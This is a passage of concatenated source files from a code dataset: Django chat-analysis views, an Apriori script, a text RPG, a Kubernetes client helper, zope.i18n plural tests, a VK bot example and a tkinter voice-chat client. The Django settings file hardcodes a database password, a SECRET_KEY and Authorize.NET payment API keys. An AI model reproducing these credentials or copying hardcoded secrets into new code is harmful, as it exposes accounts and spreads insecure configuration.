chat_count\n return 0\n\n# Create your views here.\ndef homepage(request):\n\n raw_chat_ranking = Chat.objects.exclude(name__isnull=True).exclude(name__exact='').order_by('messages').reverse()\n chat_ranking = []\n\n for chat in raw_chat_ranking:\n chat_ranking.append({'name': chat.name, 'messages': place_value(chat.messages)})\n \n return render(request, 'web/index.html', {'chat_count': get_chat_number(), 'message_count': get_msg_number(), 'chat_ranking':chat_ranking})\n\ndef analyze(request):\n if request.method == 'POST' and request.FILES['myfile']:\n chat_name = request.POST.get('chat-name')\n myfile = request.FILES['myfile']\n\n fs = FileSystemStorage(location=os.path.join(settings.BASE_DIR, 'media/raw'))\n filename = fs.save(myfile.name, myfile)\n \n conversation = Conversation(filename=filename)\n conversation_data = conversation.parse_data()\n\n analyzer = Analyzer(conversation_data, chat_name)\n data = analyzer.analyze()\n\n year_data = analyzer.year_analysis()\n\n json_data = json.dumps(data, cls=NpEncoder)\n year_data_json = json.dumps(year_data, cls=NpEncoder)\n\n if not chat_name:\n chat = Chat(messages=data['Total_Messages'])\n else:\n chat = Chat(messages=data['Total_Messages'], name=chat_name)\n\n \n \n chat.save()\n\n conversation.delete_files()\n\n\n return render(request, 'web/analyze.html', {\n 'json_data': json_data,\n 'year_data': year_data_json,\n 'year_count': year_data,\n 'chat_count': get_chat_number(),\n 'message_count': get_msg_number(),\n 'chat_name': chat_name\n })\n\n return render(request, 'web/analyze.html')\n","sub_path":"web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445333684","text":"# Apriori\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Data Preprocessing\ndataset = pd.read_csv('Market_Basket_Optimisation.csv', header = None)\ntransactions = []\nfor i in range(0, 7501):\n transactions.append([str(dataset.values[i,j]) for j in range(0, 20)])\n\n# Training Apriori on the dataset\nfrom apyori import apriori\nrules = apriori(transactions, min_support = 0.003, min_confidence = 0.2, min_lift = 3, min_length = 2)\n\n# Visualising the results\nresults = list(rules)\n\ndef display_top_products(results, n_products=5):\n print(\"Support\\tConf.\\tLift\\tProducts\")\n for result in results[:n_products]:\n support = round(100 * result.support, 2)\n confidence = round(result.ordered_statistics[0].confidence, 2)\n lift = round(result.ordered_statistics[0].lift, 2)\n products = \" + \".join(list(result.items))\n print(\"{0}%\\t{1}\\t{2}\\t{3}\".format(support, confidence, lift, products))\ndisplay_top_products(results, 20)","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5898870","text":"from enemy_units import *\nfrom witcher_unit import *\nfrom game import *\n\n\n\n\ndef welcome():\n print('Вас приветствует текстовая RPG - Ведьмак')\n\n\ndef get_initial_values():\n witcher_level = 0\n enemy_level = 0\n enemy_amount = 0\n while witcher_level == 0:\n try:\n witcher_level = int(input('Введите уровень ведьмака: '))\n enemy_level = int(input('Введите уровень противников: '))\n enemy_amount = int(input('Введите количество противников: '))\n return witcher_level, enemy_level, enemy_amount\n except Exception:\n print('не введено требуемое значение')\n\n\ndef get_env_and_start(witcher_level, enemy_level, enemy_amount):\n witcher = Witcher(witcher_level)\n type_enemy = random.randint(0, 2)\n enemies = []\n if type_enemy == 0:\n for el in range(0, enemy_amount):\n drowner = Drowner(enemy_level)\n enemies.append(drowner)\n\n elif type_enemy == 1:\n for el in range(0, enemy_amount):\n bandit = Bandit(enemy_level)\n enemies.append(bandit)\n else:\n for el in range(0, enemy_amount):\n ghost = Ghost(enemy_level)\n enemies.append(ghost)\n\n beginning_game = Game(witcher, enemies)\n\n print(beginning_game.fight())\n print('Лог боя: ')\n for el in beginning_game.history:\n print(' ' + el)\n print(beginning_game.find_turn_log('Ход 0'))\n\n\nwelcome()\nwitcher_level, enemy_level, enemy_amount = get_initial_values()\nget_env_and_start(witcher_level, enemy_level, enemy_amount)","sub_path":"main_start.py","file_name":"main_start.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268719825","text":"# Django settings for albatross_api project.\nimport os\n\nROOT_PATH = os.path.dirname(os.path.abspath(__file__))\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Dani Roxberry', 'droxberry@proace.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'albatross', # Or path to database file if using sqlite3.\n 'USER': 'albatross', # Not used with sqlite3.\n 'PASSWORD': 'lufyr8_Qk3', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n# Custom User Profile Module\nAUTH_PROFILE_MODULE = 'albatross_api.api.UserProfile'\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'America/Chicago'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = os.path.join(ROOT_PATH, 'media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = os.path.join(ROOT_PATH, 'static')\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'x0we*7*jnf&cpa8op3&j0bvi2#(b45zix0jbv8vcti0l1%9!n&'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'albatross_api.urls'\n\nAUTHENTICATION_BACKENDS = (\n 'emailusernames.backends.EmailAuthBackend',\n)\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'albatross_api.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(ROOT_PATH, 'templates'),\n)\n\nINSTALLED_APPS = (\n 'grappelli', # django-grappelli\n 'annoying', # django-annoying\n\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n \n 'cloudinary',\n 'dj_database_url',\n 'south',\n 'djangorestframework',\n 'gunicorn',\n 'emailusernames',\n\n 'albatross_api.api',\n 'albatross_api.courses',\n 'albatross_api.deals',\n 'albatross_api.payments',\n)\n\n# Authorize.NET Payments\nAUTHORIZE_NET_API_TEST_LOGIN_ID = '6jL8p6YLga'\nAUTHORIZE_NET_API_TEST_TRANSACTION_KEY = '683yXy3FNv75kT59'\nAUTHORIZE_NET_API_LOGIN_ID = '7462PazjGf'\nAUTHORIZE_NET_API_TRANSACTION_KEY = '4p6Hs4hTYZ87647B'\n\n# GeoNames Reverse Geocoding for Zip Codes\nZIP_CODE_REVERSE_URL = 'http://api.geonames.org/postalCodeLookupJSON?formatted=true&country=US&username=albatrossgolfapp&style=full&postalcode=';\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n# SendGrid Config\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'smtp.sendgrid.net'\nEMAIL_HOST_USER = os.environ['SENDGRID_USERNAME']\nEMAIL_HOST_PASSWORD = os.environ['SENDGRID_PASSWORD']\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n\n# dj-database-url requirement for Heroku.\nimport dj_database_url\nDATABASES = {'default': dj_database_url.config(default='postgres://albatross:lufyr8_Qk3@localhost:5432/albatross')}\n\n# Import Heroku Settings\ntry:\n IS_HEROKU = os.environ['IS_HEROKU']\n if IS_HEROKU == 1:\n from heroku_settings import *\nexcept ImportError:\n pass","sub_path":"django/Albatross-Technologies/albatross-technologies/albatross_api/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332627149","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Test a gettext implementation of a Message Catalog.\n\"\"\"\nimport os\nimport unittest\n\nimport zope.component\nfrom zope.i18nmessageid import MessageFactory\n\nfrom zope.i18n import tests\nfrom zope.i18n import translate\nfrom zope.i18n.gettextmessagecatalog import GettextMessageCatalog\nfrom zope.i18n.interfaces import ITranslationDomain\nfrom zope.i18n.testing import compile_po\nfrom zope.i18n.translationdomain import TranslationDomain\n\n\nclass TestPlurals(unittest.TestCase):\n\n def _getMessageCatalog(self, locale, variant=\"default\"):\n path = os.path.dirname(tests.__file__)\n self._path = os.path.join(\n path, f'locale-{variant}', locale, 'LC_MESSAGES', f'{variant}.mo')\n compile_po(self._path)\n catalog = GettextMessageCatalog(locale, variant, self._path)\n return catalog\n\n def _getTranslationDomain(self, locale, variant=\"default\"):\n path = os.path.dirname(tests.__file__)\n self._path = os.path.join(\n path, f'locale-{variant}', locale, 'LC_MESSAGES', f'{variant}.mo')\n compile_po(self._path)\n catalog = GettextMessageCatalog(locale, variant, self._path)\n domain = TranslationDomain('default')\n domain.addCatalog(catalog)\n return domain\n\n def test_missing_queryPluralMessage(self):\n catalog = self._getMessageCatalog('en')\n self.assertEqual(catalog.language, 'en')\n\n self.assertEqual(\n catalog.queryPluralMessage(\n 'One apple', '%d apples', 0,\n dft1='One fruit', dft2='%d fruits'),\n '0 fruits')\n\n self.assertEqual(\n catalog.queryPluralMessage(\n 'One apple.', '%d apples.', 1,\n dft1='One fruit', dft2='%d fruits'),\n 'One fruit')\n\n self.assertEqual(\n catalog.queryPluralMessage(\n 'One apple.', '%d apples.', 2,\n dft1='One fruit', dft2='%d fruits'),\n '2 fruits')\n\n def test_missing_getPluralMessage(self):\n catalog = self._getMessageCatalog('en')\n self.assertEqual(catalog.language, 'en')\n\n with self.assertRaises(KeyError):\n catalog.getPluralMessage('One apple', '%d fruits', 0)\n\n with self.assertRaises(KeyError):\n catalog.getPluralMessage('One apple', '%d fruits', 1)\n\n with self.assertRaises(KeyError):\n catalog.getPluralMessage('One apple', '%d fruits', 2)\n\n def test_GermanPlurals(self):\n \"\"\"Germanic languages such as english and german share the plural\n rule. We test the german here.\n \"\"\"\n catalog = self._getMessageCatalog('de')\n self.assertEqual(catalog.language, 'de')\n\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 1),\n 'Es gibt eine Datei.')\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 3),\n 'Es gibt 3 Dateien.')\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 0),\n 'Es gibt 0 Dateien.')\n\n # Unknown id\n self.assertRaises(KeyError, catalog.getPluralMessage,\n 'There are %d files.', 'bar', 6)\n\n # Query without default values\n self.assertEqual(catalog.queryPluralMessage(\n 'There is one file.', 'There are %d files.', 1),\n 'Es gibt eine Datei.')\n self.assertEqual(catalog.queryPluralMessage(\n 'There is one file.', 'There are %d files.', 3),\n 'Es gibt 3 Dateien.')\n\n # Query with default values\n self.assertEqual(catalog.queryPluralMessage(\n 'There are %d files.', 'There is one file.', 1,\n 'Es gibt 1 Datei.', 'Es gibt %d Dateien !', ),\n 'Es gibt 1 Datei.')\n self.assertEqual(catalog.queryPluralMessage(\n 'There are %d files.', 'There is one file.', 3,\n 'Es gibt 1 Datei.', 'Es gibt %d Dateien !', ),\n 'Es gibt 3 Dateien !')\n\n def test_PolishPlurals(self):\n \"\"\"Polish has a complex rule for plurals. It makes for a good\n test subject.\n \"\"\"\n catalog = self._getMessageCatalog('pl')\n self.assertEqual(catalog.language, 'pl')\n\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 0),\n \"Istnieją 0 plików.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 1),\n \"Istnieje 1 plik.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 3),\n \"Istnieją 3 pliki.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 17),\n \"Istnieją 17 plików.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 23),\n \"Istnieją 23 pliki.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 28),\n \"Istnieją 28 plików.\")\n\n def test_floater(self):\n \"\"\"Test with the number being a float.\n We can use %f or %s to make sure it works.\n \"\"\"\n catalog = self._getMessageCatalog('en')\n self.assertEqual(catalog.language, 'en')\n\n # It's cast to integer because of the %d in the translation string.\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 1.0),\n 'There is one file.')\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 3.5),\n 'There are 3 files.')\n\n # It's cast to a string because of the %s in the translation string.\n self.assertEqual(catalog.getPluralMessage(\n 'The item is rated 1/5 star.',\n 'The item is rated %s/5 stars.', 3.5),\n 'The item is rated 3.5/5 stars.')\n\n # It's cast either to an int or a float because of the %s in\n # the translation string.\n self.assertEqual(catalog.getPluralMessage(\n 'There is %d chance.',\n 'There are %f chances.', 1.5),\n 'There are 1.500000 chances.')\n self.assertEqual(catalog.getPluralMessage(\n 'There is %d chance.',\n 'There are %f chances.', 3.5),\n 'There are 3.500000 chances.')\n\n def test_translate_without_defaults(self):\n domain = self._getTranslationDomain('en')\n zope.component.provideUtility(domain, ITranslationDomain, 'default')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=0),\n '0 apples')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=1),\n 'One apple')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=2),\n '2 apples')\n\n def test_translate_with_defaults(self):\n domain = self._getTranslationDomain('en')\n zope.component.provideUtility(domain, ITranslationDomain, 'default')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=0,\n default='One fruit', default_plural='%d fruits'),\n '0 fruits')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=1,\n default='One fruit', default_plural='%d fruits'),\n 'One fruit')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=2,\n default='One fruit', default_plural='%d fruits'),\n '2 fruits')\n\n def test_translate_message_without_defaults(self):\n domain = self._getTranslationDomain('en')\n factory = MessageFactory('default')\n zope.component.provideUtility(domain, ITranslationDomain, 'default')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples',\n number=0)),\n '0 apples')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples',\n number=1)),\n 'One apple')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples',\n number=2)),\n '2 apples')\n\n def test_translate_message_with_defaults(self):\n domain = self._getTranslationDomain('en')\n factory = MessageFactory('default')\n zope.component.provideUtility(domain, ITranslationDomain, 'default')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples', number=0,\n default='One fruit',\n default_plural='%d fruits')),\n '0 fruits')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples', number=1,\n default='One fruit',\n default_plural='%d fruits')),\n 'One fruit')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples', number=2,\n default='One fruit',\n default_plural='%d fruits')),\n '2 fruits')\n\n def test_translate_recursive(self):\n domain = self._getTranslationDomain('en')\n factory = MessageFactory('default')\n\n # Singular\n banana = factory('banana', msgid_plural='bananas', number=1)\n phrase = factory('There is %d ${type}.',\n msgid_plural='There are %d ${type}.',\n number=1, mapping={'type': banana})\n self.assertEqual(\n domain.translate(phrase, target_language=\"en\"),\n 'There is 1 banana.')\n\n # Plural\n apple = factory('apple', msgid_plural='apples', number=10)\n phrase = factory('There is %d ${type}.',\n msgid_plural='There are %d ${type}.',\n number=10, mapping={'type': apple})\n self.assertEqual(\n domain.translate(phrase, target_language=\"en\"),\n 'There are 10 apples.')\n\n # Straight translation with translatable mapping\n apple = factory('apple', msgid_plural='apples', number=75)\n self.assertEqual(\n domain.translate(msgid='There is %d ${type}.',\n msgid_plural='There are %d ${type}.',\n mapping={'type': apple},\n target_language=\"en\", number=75),\n 'There are 75 apples.')\n\n # Add another catalog, to test the domain's catalogs iteration\n # We add this catalog in first position, to resolve the translations\n # there first.\n alt_en = self._getMessageCatalog('en', variant=\"alt\")\n domain._data[alt_en.getIdentifier()] = alt_en\n domain._catalogs[alt_en.language].insert(0, alt_en.getIdentifier())\n\n apple = factory('apple', msgid_plural='apples', number=42)\n self.assertEqual(\n domain.translate(msgid='There is %d ${type}.',\n msgid_plural='There are %d ${type}.',\n mapping={'type': apple},\n target_language=\"de\", number=42),\n 'There are 42 oranges.')\n","sub_path":"src/zope/i18n/tests/test_plurals.py","file_name":"test_plurals.py","file_ext":"py","file_size_in_byte":12821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"250934359","text":"import re\nfrom base64 import b64decode\nfrom collections import defaultdict\nfrom tempfile import NamedTemporaryFile\nfrom typing import TYPE_CHECKING, List, Optional\n\nimport kubernetes\nimport requests\nimport yaml\nfrom urllib3.exceptions import MaxRetryError\n\nfrom hermes.cloudbreak.kubernetes.base import (\n DaemonSet,\n Deployment,\n Resource,\n Service,\n)\nfrom hermes.cloudbreak.utils import snakeify\n\nif TYPE_CHECKING:\n from hermes.cloudbreak.clouds.base.kubernetes import Cluster\n\n\nclass K8sApiClient:\n def __init__(self, cluster: \"Cluster\"):\n # TODO: generalize the initialization putting methods\n # on the `cluster` object to return the appropriate\n # information\n try:\n response = cluster.get()\n except requests.HTTPError as e:\n if e.code == 404:\n raise RuntimeError(f\"Cluster {cluster} not currently deployed\")\n raise\n\n # create configuration using bare minimum info\n configuration = kubernetes.client.Configuration()\n configuration.host = f\"https://{response.endpoint}\"\n\n with NamedTemporaryFile(delete=False) as ca_cert:\n certificate = response.master_auth.cluster_ca_certificate\n ca_cert.write(b64decode(certificate))\n\n cluster.refresh_credentials()\n configuration.ssl_ca_cert = ca_cert.name\n configuration.api_key_prefix[\"authorization\"] = \"Bearer\"\n configuration.api_key[\"authorization\"] = cluster.token.decode()\n\n # return client instantiated with configuration\n self.cluster = cluster\n self._client = kubernetes.client.ApiClient(configuration)\n\n # look in some default locations for existing resources\n self._deployments = defaultdict(dict)\n self._services = defaultdict(dict)\n self._daemon_sets = defaultdict(dict)\n\n self.get_resources_for_namespace(\"default\")\n self.get_resources_for_namespace(\"kube-system\")\n\n def _add_resource(self, resource):\n resources = getattr(\n self, \"_\" + snakeify(resource.__class__.__name__) + \"s\"\n )\n resources[resource.namespace][resource.name] = resource\n\n def get_resources_for_namespace(self, namespace: str):\n apps_client = kubernetes.client.AppsV1Api(self._client)\n for deployment in apps_client.list_namespaced_deployment(\n namespace\n ).items:\n deployment = Deployment(self, deployment.metadata.name, namespace)\n self._add_resource(deployment)\n\n for daemon_set in apps_client.list_namespaced_daemon_set(\n namespace\n ).items:\n daemon_set = DaemonSet(self, daemon_set.metadata.name, namespace)\n self._add_resource(daemon_set)\n\n core_client = kubernetes.client.CoreV1Api(self._client)\n for service in core_client.list_namespaced_service(namespace).items:\n service = Service(self, service.metadata.name, namespace)\n self._add_resource(service)\n\n def create_from_yaml(\n self,\n file: str,\n repo: Optional[str] = None,\n branch: Optional[str] = None,\n exists_ok: bool = True,\n **kwargs,\n ) -> List[Resource]:\n # get deploy file content either from\n # local file or from github repo. Parse\n # yaml go template wildcards with kwargs\n content = get_content(file, repo, branch, **kwargs)\n\n failures = []\n k8s_objects = []\n\n # loop through content explicitly so that we\n # can preserver order for returning things\n for yml_document in content.split(\"---\\n\"):\n if not yml_document:\n continue\n\n # load the string to a dict\n yml_document = yaml.safe_load(yml_document)\n\n try:\n # first try to create the resource, assuming\n # it doesn't exist\n created = Resource.create(self, yml_document)\n\n # add the created resource to our internal\n # mapping of resources, and append it to return\n self._add_resource(created)\n k8s_objects.append(created)\n except kubernetes.utils.FailToCreateError as failure:\n # kubernetes exception in creation. Keep track\n # of all that get raised and raise them at the end\n for exc in failure.api_exceptions:\n if exc.status == 409 and exists_ok:\n # if the exception was that the object already\n # exists in the namespace and we indicated that\n # this was ok, find a workaround to return the\n # appropriate object\n metadata = yml_document[\"metadata\"]\n kind = yml_document[\"kind\"]\n\n try:\n # try to get an object that's already been\n # created if one exists\n resources = getattr(\n self, \"_\" + snakeify(kind) + \"s\"\n )\n created = resources[metadata[\"namespace\"]][\n metadata[\"name\"]\n ]\n except KeyError:\n # do a lazy creation of the object using\n # the metadata\n if kind == \"Deployment\":\n cls = Deployment\n elif kind == \"Service\":\n cls = Service\n elif kind == \"DaemonSet\":\n cls = DaemonSet\n else:\n raise ValueError(\n \"Resource kind {} not supported \".format(\n kind\n )\n )\n\n # create the object via regular initialization\n created = cls(\n self, metadata[\"name\"], metadata[\"namespace\"]\n )\n\n # add the object to internal resource mapping\n self._add_resource(created)\n\n # either way append the object to our returns\n k8s_objects.append(created)\n else:\n # in any other case, keep track of the exception\n # to raise later\n failures.append(exc)\n except MaxRetryError:\n raise RuntimeError(\n \"Cluster occupied and couldn't connect to create\"\n )\n\n if failures:\n # raise any and all kubernetes failures at once if we have any\n raise kubernetes.utils.FailToCreateError(failures)\n\n # otherwise return all the relevant objects\n # that were specified in the yaml\n return k8s_objects\n\n\ndef get_content(\n file: str,\n repo: Optional[str] = None,\n branch: Optional[str] = None,\n **kwargs,\n) -> str:\n if repo is not None:\n if branch is None:\n # if we didn't specify a branch, default to\n # trying main first but try master next in\n # case the repo hasn't changed yet\n branches = [\"main\", \"master\"]\n else:\n # otherwise just use the specified branch\n branches = [branch]\n\n for branch in branches:\n url = f\"https://raw.githubusercontent.com/{repo}/{branch}/{file}\"\n try:\n response = requests.get(url)\n response.raise_for_status()\n content = response.content.decode()\n break\n except Exception:\n pass\n else:\n raise ValueError(\n \"Couldn't find file {} at github repo {} \"\n \"in branches {}\".format(file, repo, \", \".join(branches))\n )\n else:\n with open(file, \"r\") as f:\n content = f.read()\n\n return sub_values(content, **kwargs)\n\n\ndef sub_values(content: str, **kwargs) -> str:\n \"\"\"Sub wildcard values into string\n\n Hacky replacement for helm-style variable values in\n K8s YAML descriptions. Wildcards are specified in\n `content` via {{ .Values. }}, and will\n be replaced by their value in `**kwargs`. If a variable\n value is not given a kwarg, or if a kwarg is passed\n without a relevant wildcard, a ValueError is raised\n \"\"\"\n\n match_re = re.compile(\"(?<={{ .Values.)[a-zA-Z0-9]+?(?= }})\")\n found = set()\n\n def replace_fn(match):\n varname = match_re.search(match.group(0)).group(0)\n found.add(varname)\n try:\n return str(kwargs[varname])\n except KeyError:\n raise ValueError(f\"No value provided for wildcard {varname}\")\n\n content = re.sub(\"{{ .Values.[a-zA-Z0-9]+? }}\", replace_fn, content)\n\n missing = set(kwargs) - found\n if missing:\n raise ValueError(\n \"Provided unused wildcard values: {}\".format(\", \".join(missing))\n )\n return content\n","sub_path":"libs/hermes/hermes.cloudbreak/hermes/cloudbreak/kubernetes/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330538365","text":"import os\n\nfrom vkbottle.bot import Bot, Message\nfrom vkbottle.tools import DocMessagesUploader\n\nbot = Bot(os.environ[\"token\"])\n\n\n# already uploaded picture\n@bot.on.message(command=\"ларс\")\nasync def lars_handler(m: Message):\n await m.answer(attachment=\"photo-41629685_457239401\")\n\n\n# on-handler processing upload\n@bot.on.message(command=\"ридми\")\nasync def readme_handler(m: Message):\n doc = await DocMessagesUploader(bot.api).upload(\n \"readme.md\", \"../../README.md\", peer_id=m.peer_id\n )\n await m.answer(attachment=doc)\n\n\nbot.run_forever()\n","sub_path":"examples/high-level/photo_upload_example.py","file_name":"photo_upload_example.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592389056","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom threading import Thread, enumerate, active_count\nimport time\nfrom winsound import PlaySound, SND_LOOP, SND_ASYNC, SND_PURGE\nfrom client.gui_methods import center_window, pop_up_message\nfrom client import ask_server\nfrom client.chat_client import ChatClient\n\n\n# creates the pages and shows them\nclass App(Tk):\n start_page_background = r\"..\\media\\bg_pic.png\"\n\n def __init__(self, *args, **kwargs):\n Tk.__init__(self, *args, **kwargs)\n self.title('VoiceChat')\n # Setup Frame\n self.container = Frame(self)\n self.container.pack(side=\"top\", fill=\"both\", expand=True)\n self.container.grid_rowconfigure(0, weight=1)\n self.container.grid_columnconfigure(0, weight=1)\n\n self.username = ''\n self.target = ''\n self.user_called = ''\n\n self.frames = {}\n\n self.sp_background = PhotoImage(file=App.start_page_background)\n\n # self.threading_state() # used for debugging\n self.create_frames()\n center_window(self)\n self.show_frame(StartPage)\n # The following three commands are needed so the window pops\n # up on top on Windows...\n self.iconify()\n self.update()\n self.deiconify()\n\n def create_frames(self):\n for F in (StartPage, Login, Register, Main, Calling, Called, Chat):\n frame = F(self.container, self)\n self.frames[F] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n def show_frame(self, context):\n frame = self.frames[context]\n frame.tkraise()\n\n def threading_state(self, wait=8000):\n threads = [thread.getName() for thread in enumerate() if thread.getName() != 'MainThread']\n if threads:\n print('threads num:', active_count() - 1)\n print(threads)\n self.after(wait, self.threading_state)\n\n\n# chat page\nclass Chat(Frame):\n def __init__(self, master, controller):\n super().__init__(master)\n self.controller = controller\n self.msg = Label(self, font=('Ariel', 20), foreground='green')\n self.msg.pack()\n Button(self, text='End Chat', command=self.stop_chat).pack()\n\n def stop_chat(self):\n ask_server.stop(self.controller.username, 'call')\n\n def start_chat(self):\n user = self.controller.target\n if not user:\n user = self.controller.user_called\n self.msg['text'] = f'In chat with {user}'\n self.client = ChatClient()\n Thread(target=self.chat_ended, name='chat_ended', daemon=True).start()\n self.client.start()\n\n def chat_ended(self):\n time.sleep(2)\n while True:\n time.sleep(1)\n if not ask_server.is_in_chat(self.controller.username):\n self.client.end()\n self.controller.show_frame(Main)\n time.sleep(0.4)\n 